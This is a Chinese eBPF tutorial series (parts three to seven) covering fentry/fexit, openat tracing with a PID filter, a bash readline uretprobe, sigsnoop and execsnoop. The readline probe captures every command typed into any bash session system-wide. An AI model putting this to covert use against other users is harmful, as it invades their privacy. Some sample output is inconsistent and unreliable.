<p>通过这个示例,您可以学习如何在eBPF中使用fentry和fexit探针来监控和捕获内核函数调用,例如在本教程中的unlink系统调用。</p>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ ecc fentry-link.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
$ sudo ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>在另外一个窗口中:</p>
|
||
<pre><code class="language-shell">touch test_file
|
||
rm test_file
|
||
touch test_file2
|
||
rm test_file2
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file
|
||
rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file, ret = 0
|
||
rm-9290 [004] d..2 4637.798698: bpf_trace_printk: fentry: pid = 9290, filename = test_file2
|
||
rm-9290 [004] d..2 4637.798843: bpf_trace_printk: fexit: pid = 9290, filename = test_file2, ret = 0
|
||
</code></pre>
|
||
<h2 id="总结-2"><a class="header" href="#总结-2">总结</a></h2>
|
||
<p>这段程序是一个 eBPF 程序,通过 fentry 和 fexit 探针(对应的 BPF 程序分别为 do_unlinkat 和 do_unlinkat_exit)跟踪内核函数 do_unlinkat 的入口和退出,并通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 do_unlinkat 的进程 ID、文件名和返回值,并在内核日志中打印出来。</p>
|
||
<p>编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令,并通过查看 /sys/kernel/debug/tracing/trace_pipe 文件查看 eBPF 程序的输出。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程四在-ebpf-中捕获进程打开文件的系统调用集合使用全局变量过滤进程-pid"><a class="header" href="#ebpf-入门开发实践教程四在-ebpf-中捕获进程打开文件的系统调用集合使用全局变量过滤进程-pid">eBPF 入门开发实践教程四:在 eBPF 中捕获进程打开文件的系统调用集合,使用全局变量过滤进程 pid</a></h1>
|
||
<p>eBPF(Extended Berkeley Packet Filter)是一种内核执行环境,它可以让用户在内核中运行一些安全的、高效的程序。它通常用于网络过滤、性能分析、安全监控等场景。eBPF 之所以强大,是因为它能够在内核运行时捕获和修改数据包或者系统调用,从而实现对操作系统行为的监控和调整。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第四篇,主要介绍如何捕获进程打开文件的系统调用集合,并使用全局变量在 eBPF 中过滤进程 pid。</p>
|
||
<p>在 Linux 系统中,进程与文件之间的交互是通过系统调用来实现的。系统调用是用户态程序与内核态程序之间的接口,它们允许用户态程序请求内核执行特定操作。在本教程中,我们关注的是 sys_openat 系统调用,它是用于打开文件的。</p>
|
||
<p>当进程打开一个文件时,它会向内核发出 sys_openat 系统调用,并传递相关参数(例如文件路径、打开模式等)。内核会处理这个请求,并返回一个文件描述符(file descriptor),这个描述符将在后续的文件操作中用作引用。通过捕获 sys_openat 系统调用,我们可以了解进程在什么时候以及如何打开文件。</p>
|
||
<h2 id="在-ebpf-中捕获进程打开文件的系统调用集合"><a class="header" href="#在-ebpf-中捕获进程打开文件的系统调用集合">在 eBPF 中捕获进程打开文件的系统调用集合</a></h2>
|
||
<p>首先,我们需要编写一段 eBPF 程序来捕获进程打开文件的系统调用,具体实现如下:</p>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
|
||
/// @description "Process ID to trace"
|
||
const volatile int pid_target = 0;
|
||
|
||
SEC("tracepoint/syscalls/sys_enter_openat")
|
||
int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter* ctx)
|
||
{
|
||
u64 id = bpf_get_current_pid_tgid();
|
||
u32 pid = id;
|
||
|
||
if (pid_target && pid_target != pid)
|
||
return false;
|
||
// Use bpf_printk to print the process information
|
||
bpf_printk("Process ID: %d enter sys openat\n", pid);
|
||
return 0;
|
||
}
|
||
|
||
/// "Trace open family syscalls."
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段 eBPF 程序实现了:</p>
|
||
<ol>
|
||
<li>引入头文件:<vmlinux.h> 包含了内核数据结构的定义,<bpf/bpf_helpers.h> 包含了 eBPF 程序所需的辅助函数。</li>
|
||
<li>定义全局变量 pid_target,用于过滤指定进程 ID。这里设为 0 表示捕获所有进程的 sys_openat 调用。</li>
|
||
<li>使用 SEC 宏定义一个 eBPF 程序,关联到 tracepoint "tracepoint/syscalls/sys_enter_openat"。这个 tracepoint 会在进程发起 sys_openat 系统调用时触发。</li>
|
||
<li>实现 eBPF 程序 tracepoint__syscalls__sys_enter_openat,它接收一个类型为 struct trace_event_raw_sys_enter 的参数 ctx。这个结构体包含了关于系统调用的信息。</li>
|
||
<li>使用 bpf_get_current_pid_tgid() 函数获取当前进程的 PID 和 TGID(线程组 ID)。由于我们只关心 PID,所以将其赋值给 u32 类型的变量 pid。</li>
|
||
<li>检查 pid_target 变量是否与当前进程的 pid 相等。如果 pid_target 不为 0 且与当前进程的 pid 不相等,则返回 false,不对该进程的 sys_openat 调用进行捕获。</li>
|
||
<li>使用 bpf_printk() 函数打印捕获到的进程 ID 和 sys_openat 调用的相关信息。这些信息将在用户空间通过 BPF 工具查看。</li>
|
||
<li>将程序许可证设置为 "GPL",这是运行 eBPF 程序的必要条件。</li>
|
||
</ol>
|
||
<p>这个 eBPF 程序可以通过 libbpf 或 eunomia-bpf 等工具加载到内核并执行。它将捕获指定进程(或所有进程)的 sys_openat 系统调用,并在用户空间输出相关信息。</p>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ ecc opensnoop.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
$ sudo ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
<...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 3840345 enter sys openat
|
||
<...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 3840345 enter sys openat
|
||
</code></pre>
|
||
<p>此时,我们已经能够捕获进程打开文件的系统调用了。</p>
|
||
<h2 id="使用全局变量在-ebpf-中过滤进程-pid"><a class="header" href="#使用全局变量在-ebpf-中过滤进程-pid">使用全局变量在 eBPF 中过滤进程 pid</a></h2>
|
||
<p>全局变量在 eBPF 程序中充当一种数据共享机制,它们允许用户态程序与 eBPF 程序之间进行数据交互。这在过滤特定条件或修改 eBPF 程序行为时非常有用。这种设计使得用户态程序能够在运行时动态地控制 eBPF 程序的行为。</p>
|
||
<p>在我们的例子中,全局变量 <code>pid_target</code> 用于过滤进程 PID。用户态程序可以设置此变量的值,以便在 eBPF 程序中只捕获与指定 PID 相关的 <code>sys_openat</code> 系统调用。</p>
|
||
<p>使用全局变量的原理是,全局变量在 eBPF 程序的数据段(data section)中定义并存储。当 eBPF 程序加载到内核并执行时,这些全局变量会保持在内核中,可以通过 BPF 系统调用进行访问。用户态程序可以使用 BPF 系统调用中的某些特性,如 bpf_obj_get_info_by_fd 和 bpf_obj_get_info,获取 eBPF 对象的信息,包括全局变量的位置和值。</p>
|
||
<p>可以通过执行 ecli -h 命令来查看 opensnoop 的帮助信息:</p>
|
||
<pre><code class="language-console">$ ecli package.json -h
|
||
Usage: opensnoop_bpf [--help] [--version] [--verbose] [--pid_target VAR]
|
||
|
||
Trace open family syscalls.
|
||
|
||
Optional arguments:
|
||
-h, --help shows help message and exits
|
||
-v, --version prints version information and exits
|
||
--verbose prints libbpf debug information
|
||
--pid_target Process ID to trace
|
||
|
||
Built with eunomia-bpf framework.
|
||
See https://github.com/eunomia-bpf/eunomia-bpf for more information.
|
||
</code></pre>
|
||
<p>可以通过 --pid_target 参数来指定要捕获的进程的 pid,例如:</p>
|
||
<pre><code class="language-console">$ sudo ./ecli run package.json --pid_target 618
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
<...>-3840345 [010] d... 3220701.101179: bpf_trace_printk: Process ID: 618 enter sys openat
|
||
<...>-3840345 [010] d... 3220702.158000: bpf_trace_printk: Process ID: 618 enter sys openat
|
||
</code></pre>
|
||
<h2 id="总结-3"><a class="header" href="#总结-3">总结</a></h2>
|
||
<p>本文介绍了如何使用 eBPF 程序来捕获进程打开文件的系统调用。在 eBPF 程序中,我们可以通过定义 tracepoint__syscalls__sys_enter_openat 函数并使用 SEC 宏把它附加到 sys_enter_openat 这个 tracepoint 来捕获进程打开文件的系统调用(同样的方法也适用于 sys_enter_open 等其他 tracepoint)。我们可以使用 bpf_get_current_pid_tgid 函数获取调用 openat 系统调用的进程 ID,并使用 bpf_printk 函数在内核日志中打印出来。在 eBPF 程序中,我们还可以通过定义一个全局变量 pid_target 来指定要捕获的进程的 pid,从而过滤输出,只输出指定的进程的信息。</p>
|
||
<p>通过学习本教程,您应该对如何在 eBPF 中捕获和过滤特定进程的系统调用有了更深入的了解。这种方法在系统监控、性能分析和安全审计等场景中具有广泛的应用。</p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程五在-ebpf-中使用--uprobe-捕获-bash-的-readline-函数调用"><a class="header" href="#ebpf-入门开发实践教程五在-ebpf-中使用--uprobe-捕获-bash-的-readline-函数调用">eBPF 入门开发实践教程五:在 eBPF 中使用 uprobe 捕获 bash 的 readline 函数调用</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第五篇,主要介绍如何使用 uprobe 捕获 bash 的 readline 函数调用。</p>
|
||
<h2 id="什么是uprobe"><a class="header" href="#什么是uprobe">什么是uprobe</a></h2>
|
||
<p>uprobe是一种用户空间探针,uprobe探针允许在用户空间程序中动态插桩,插桩位置包括:函数入口、特定偏移处,以及函数返回处。当我们定义uprobe时,内核会在附加的指令上创建快速断点指令(x86机器上为int3指令),当程序执行到该指令时,内核将触发事件,程序陷入到内核态,并以回调函数的方式调用探针函数,执行完探针函数再返回到用户态继续执行后续的指令。</p>
|
||
<p>uprobe基于文件,当一个二进制文件中的一个函数被跟踪时,所有使用到这个文件的进程都会被插桩,包括那些尚未启动的进程,这样就可以在全系统范围内跟踪系统调用。</p>
|
||
<p>uprobe适用于在用户态去解析一些内核态探针无法解析的流量,例如http2流量(报文header被编码,内核无法解码),https流量(加密流量,内核无法解密)。</p>
|
||
<h2 id="使用-uprobe-捕获-bash-的-readline-函数调用"><a class="header" href="#使用-uprobe-捕获-bash-的-readline-函数调用">使用 uprobe 捕获 bash 的 readline 函数调用</a></h2>
|
||
<p>uprobe 是一种用于捕获用户空间函数调用的 eBPF 的探针,我们可以通过它来捕获用户空间程序调用的系统函数。</p>
|
||
<p>例如,我们可以使用 uprobe 来捕获 bash 的 readline 函数调用,从而获取用户在 bash 中输入的命令行。示例代码如下:</p>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
#define TASK_COMM_LEN 16
|
||
#define MAX_LINE_SIZE 80
|
||
|
||
/* Format of u[ret]probe section definition supporting auto-attach:
|
||
* u[ret]probe/binary:function[+offset]
|
||
*
|
||
* binary can be an absolute/relative path or a filename; the latter is resolved to a
|
||
* full binary path via bpf_program__attach_uprobe_opts.
|
||
*
|
||
* Specifying uprobe+ ensures we carry out strict matching; either "uprobe" must be
|
||
* specified (and auto-attach is not possible) or the above format is specified for
|
||
* auto-attach.
|
||
*/
|
||
SEC("uretprobe//bin/bash:readline")
|
||
int BPF_KRETPROBE(printret, const void *ret)
|
||
{
|
||
char str[MAX_LINE_SIZE];
|
||
char comm[TASK_COMM_LEN];
|
||
u32 pid;
|
||
|
||
if (!ret)
|
||
return 0;
|
||
|
||
bpf_get_current_comm(&comm, sizeof(comm));
|
||
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
bpf_probe_read_user_str(str, sizeof(str), ret);
|
||
|
||
bpf_printk("PID %d (%s) read: %s ", pid, comm, str);
|
||
|
||
return 0;
|
||
};
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段代码的作用是在 bash 的 readline 函数返回时执行指定的 BPF_KRETPROBE 函数,即 printret 函数。</p>
|
||
<p>在 printret 函数中,我们首先获取了调用 readline 函数的进程的进程名称和进程 ID,然后通过 bpf_probe_read_user_str 函数读取了用户输入的命令行字符串,最后通过 bpf_printk 函数打印出进程 ID、进程名称和输入的命令行字符串。</p>
|
||
<p>除此之外,我们还需要通过 SEC 宏来定义 uprobe 探针,并使用 BPF_KRETPROBE 宏来定义探针函数。</p>
|
||
<p>在 SEC 宏中,我们需要指定 uprobe 的类型、要捕获的二进制文件的路径和要捕获的函数名称。例如,上面的代码中的 SEC 宏的定义如下:</p>
|
||
<pre><code class="language-c">SEC("uretprobe//bin/bash:readline")
|
||
</code></pre>
|
||
<p>这表示我们要捕获的是 /bin/bash 二进制文件中的 readline 函数。</p>
|
||
<p>接下来,我们需要使用 BPF_KRETPROBE 宏来定义探针函数,例如:</p>
|
||
<pre><code class="language-c">BPF_KRETPROBE(printret, const void *ret)
|
||
</code></pre>
|
||
<p>这里的 printret 是探针函数的名称,const void *ret 是探针函数的参数,它代表被捕获的函数的返回值。</p>
|
||
<p>然后,我们使用了 bpf_get_current_comm 函数获取当前任务的名称,并将其存储在 comm 数组中。</p>
|
||
<pre><code class="language-c"> bpf_get_current_comm(&comm, sizeof(comm));
|
||
</code></pre>
|
||
<p>使用 bpf_get_current_pid_tgid 函数获取当前进程的 PID,并将其存储在 pid 变量中。</p>
|
||
<pre><code class="language-c"> pid = bpf_get_current_pid_tgid() >> 32;
|
||
</code></pre>
|
||
<p>使用 bpf_probe_read_user_str 函数从用户空间读取 readline 函数的返回值,并将其存储在 str 数组中。</p>
|
||
<pre><code class="language-c"> bpf_probe_read_user_str(str, sizeof(str), ret);
|
||
</code></pre>
|
||
<p>最后使用 bpf_printk 函数输出 PID、任务名称和用户输入的字符串。</p>
|
||
<pre><code class="language-c"> bpf_printk("PID %d (%s) read: %s ", pid, comm, str);
|
||
</code></pre>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-console">$ ecc bashreadline.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
$ sudo ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
bash-32969 [000] d..31 64001.375748: bpf_trace_printk: PID 32969 (bash) read: fff
|
||
bash-32969 [000] d..31 64002.056951: bpf_trace_printk: PID 32969 (bash) read: fff
|
||
</code></pre>
|
||
<p>可以看到,我们成功的捕获了 bash 的 readline 函数调用,并获取了用户在 bash 中输入的命令行。</p>
|
||
<h2 id="总结-4"><a class="header" href="#总结-4">总结</a></h2>
|
||
<p>在上述代码中,我们使用 SEC 宏定义了一个 uretprobe 探针,它指定了要捕获的用户空间程序 (/bin/bash) 和要捕获的函数 (readline)。此外,我们还使用 BPF_KRETPROBE 宏定义了一个用于处理 readline 函数返回值的回调函数 (printret)。该函数可以获取到 readline 函数的返回值,并将其打印到内核日志中。通过这样的方式,我们就可以使用 eBPF 来捕获 bash 的 readline 函数调用,并获取用户在 bash 中输入的命令行。</p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程六捕获进程发送信号的系统调用集合使用-hash-map-保存状态"><a class="header" href="#ebpf-入门开发实践教程六捕获进程发送信号的系统调用集合使用-hash-map-保存状态">eBPF 入门开发实践教程六:捕获进程发送信号的系统调用集合,使用 hash map 保存状态</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第六篇,主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。</p>
|
||
<h2 id="sigsnoop"><a class="header" href="#sigsnoop">sigsnoop</a></h2>
|
||
<p>示例代码如下:</p>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
|
||
#define MAX_ENTRIES 10240
|
||
#define TASK_COMM_LEN 16
|
||
|
||
struct event {
|
||
unsigned int pid;
|
||
unsigned int tpid;
|
||
int sig;
|
||
int ret;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, __u32);
|
||
__type(value, struct event);
|
||
} values SEC(".maps");
|
||
|
||
|
||
static int probe_entry(pid_t tpid, int sig)
|
||
{
|
||
struct event event = {};
|
||
__u64 pid_tgid;
|
||
__u32 tid;
|
||
|
||
pid_tgid = bpf_get_current_pid_tgid();
|
||
tid = (__u32)pid_tgid;
|
||
event.pid = pid_tgid >> 32;
|
||
event.tpid = tpid;
|
||
event.sig = sig;
|
||
bpf_get_current_comm(event.comm, sizeof(event.comm));
|
||
bpf_map_update_elem(&values, &tid, &event, BPF_ANY);
|
||
return 0;
|
||
}
|
||
|
||
static int probe_exit(void *ctx, int ret)
|
||
{
|
||
__u64 pid_tgid = bpf_get_current_pid_tgid();
|
||
__u32 tid = (__u32)pid_tgid;
|
||
struct event *eventp;
|
||
|
||
eventp = bpf_map_lookup_elem(&values, &tid);
|
||
if (!eventp)
|
||
return 0;
|
||
|
||
eventp->ret = ret;
|
||
bpf_printk("PID %d (%s) sent signal %d to PID %d, ret = %d",
|
||
eventp->pid, eventp->comm, eventp->sig, eventp->tpid, ret);
|
||
|
||
cleanup:
|
||
bpf_map_delete_elem(&values, &tid);
|
||
return 0;
|
||
}
|
||
|
||
SEC("tracepoint/syscalls/sys_enter_kill")
|
||
int kill_entry(struct trace_event_raw_sys_enter *ctx)
|
||
{
|
||
pid_t tpid = (pid_t)ctx->args[0];
|
||
int sig = (int)ctx->args[1];
|
||
|
||
return probe_entry(tpid, sig);
|
||
}
|
||
|
||
SEC("tracepoint/syscalls/sys_exit_kill")
|
||
int kill_exit(struct trace_event_raw_sys_exit *ctx)
|
||
{
|
||
return probe_exit(ctx, ctx->ret);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
</code></pre>
|
||
<p>上面的代码定义了一个 eBPF 程序,用于捕获进程发送信号的系统调用。本示例以 kill 系统调用为例,tkill 和 tgkill 也可以用同样的方式捕获。它通过使用 tracepoint 来捕获系统调用的进入和退出事件,并在这些事件发生时执行指定的探针函数,例如 probe_entry 和 probe_exit。</p>
|
||
<p>在探针函数中,我们使用 bpf_map 存储捕获的事件信息,包括发送信号的进程 ID、接收信号的进程 ID、信号值和系统调用的返回值。在系统调用退出时,我们将获取存储在 bpf_map 中的事件信息,并使用 bpf_printk 打印进程 ID、进程名称、发送的信号和系统调用的返回值。</p>
|
||
<p>最后,我们还需要使用 SEC 宏来定义探针,并指定要捕获的系统调用的名称,以及要执行的探针函数。</p>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>编译运行上述代码:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或者</p>
|
||
<pre><code class="language-console">$ ecc sigsnoop.bpf.c
|
||
Compiling bpf object...
|
||
Generating export types...
|
||
Packing ebpf object and config into package.json...
|
||
$ sudo ecli run package.json
|
||
Runing eBPF program...
|
||
</code></pre>
|
||
<p>运行这段程序后,可以通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出:</p>
|
||
<pre><code class="language-console">$ sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
node-3517 [003] d..31 82575.798191: bpf_trace_printk: PID 3517 (node) sent signal 0 to PID 3427, ret = 0
|
||
node-15194 [003] d..31 82575.849227: bpf_trace_printk: PID 15194 (node) sent signal 0 to PID 3427, ret = 0
|
||
node-30016 [003] d..31 82576.001361: bpf_trace_printk: PID 30016 (node) sent signal 0 to PID 3427, ret = 0
|
||
cpptools-srv-38617 [002] d..31 82576.461085: bpf_trace_printk: PID 38617 (cpptools-srv) sent signal 0 to PID 30496, ret = 0
|
||
node-30040 [002] d..31 82576.467720: bpf_trace_printk: PID 30016 (node) sent signal 0 to PID 3427, ret = 0
|
||
</code></pre>
|
||
<h2 id="总结-5"><a class="header" href="#总结-5">总结</a></h2>
|
||
<p>本文主要介绍如何实现一个 eBPF 工具,捕获进程发送信号的系统调用集合,使用 hash map 保存状态。使用 hash map 需要定义一个结构体:</p>
|
||
<pre><code class="language-c">struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, __u32);
|
||
__type(value, struct event);
|
||
} values SEC(".maps");
|
||
</code></pre>
|
||
<p>并使用一些对应的 API 进行访问,例如 bpf_map_lookup_elem、bpf_map_update_elem、bpf_map_delete_elem 等。</p>
|
||
<p>更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a></p>
|
||
<p>如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门实践教程七捕获进程执行退出时间通过-perf-event-array-向用户态打印输出"><a class="header" href="#ebpf-入门实践教程七捕获进程执行退出时间通过-perf-event-array-向用户态打印输出">eBPF 入门实践教程七:捕获进程执行/退出时间,通过 perf event array 向用户态打印输出</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具,它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>本文是 eBPF 入门开发实践教程的第七篇,主要介绍如何捕获 Linux 内核中进程执行的事件,并且通过 perf event array 向用户态命令行打印输出,不需要再通过查看 /sys/kernel/debug/tracing/trace_pipe 文件来查看 eBPF 程序的输出。通过 perf event array 向用户态发送信息之后,可以进行复杂的数据处理和分析。</p>
|
||
<h2 id="perf-buffer"><a class="header" href="#perf-buffer">perf buffer</a></h2>
|
||
<p>eBPF 提供了两个环形缓冲区,可以用来将信息从 eBPF 程序传输到用户区控制器。第一个是perf环形缓冲区,它至少从内核v4.15开始就存在了。第二个是后来引入的 BPF 环形缓冲区。本文只考虑perf环形缓冲区。</p>
|
||
<h2 id="execsnoop"><a class="header" href="#execsnoop">execsnoop</a></h2>
|
||
<p>通过 perf event array 向用户态命令行打印输出,需要编写一个头文件,一个 C 源文件。示例代码如下:</p>
|
||
<p>头文件:execsnoop.h</p>
|
||
<pre><code class="language-c">#ifndef __EXECSNOOP_H
|
||
#define __EXECSNOOP_H
|
||
|
||
#define TASK_COMM_LEN 16
|
||
|
||
struct event {
|
||
int pid;
|
||
int ppid;
|
||
int uid;
|
||
int retval;
|
||
bool is_exit;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
|
||
#endif /* __EXECSNOOP_H */
|
||
</code></pre>
|
||
<p>源文件:execsnoop.bpf.c</p>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "execsnoop.h"
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY);
|
||
__uint(key_size, sizeof(u32));
|
||
__uint(value_size, sizeof(u32));
|
||
} events SEC(".maps");
|
||
|
||
SEC("tracepoint/syscalls/sys_enter_execve")
|
||
int tracepoint__syscalls__sys_enter_execve(struct trace_event_raw_sys_enter* ctx)
|
||
{
|
||
u64 id;
|
||
pid_t pid, tgid;
|
||
struct event event={0};
|
||
struct task_struct *task;
|
||
|
||
uid_t uid = (u32)bpf_get_current_uid_gid();
|
||
id = bpf_get_current_pid_tgid();
|
||
tgid = id >> 32;
|
||
|
||
event.pid = tgid;
|
||
event.uid = uid;
|
||
task = (struct task_struct*)bpf_get_current_task();
|
||
event.ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
bpf_get_current_comm(&event.comm, sizeof(event.comm));
|
||
bpf_perf_event_output(ctx, &events, BPF_F_CURRENT_CPU, &event, sizeof(event));
|
||
return 0;
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段代码定义了一个 eBPF 程序,用于捕获进程执行 execve 系统调用的入口。</p>
|
||
<p>在入口程序中,我们首先获取了当前进程的进程 ID 和用户 ID,然后通过 bpf_get_current_task 函数获取了当前进程的 task_struct 结构体,用 BPF_CORE_READ 读取了父进程 ID,并通过 bpf_get_current_comm 函数读取了进程名称。最后,我们通过 bpf_perf_event_output 函数将进程执行事件输出到 perf buffer。</p>
|
||
<p>使用这段代码,我们就可以捕获 Linux 内核中进程执行的事件, 并分析进程的执行情况。</p>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>使用容器编译:</p>
|
||
<pre><code class="language-shell">docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest
|
||
</code></pre>
|
||
<p>或者使用 ecc 编译:</p>
|
||
<pre><code class="language-shell">ecc execsnoop.bpf.c execsnoop.h
|
||
</code></pre>
|
||
<p>运行</p>
|
||
<pre><code class="language-console">$ sudo ./ecli run package.json
|
||
TIME PID PPID UID COMM
|
||
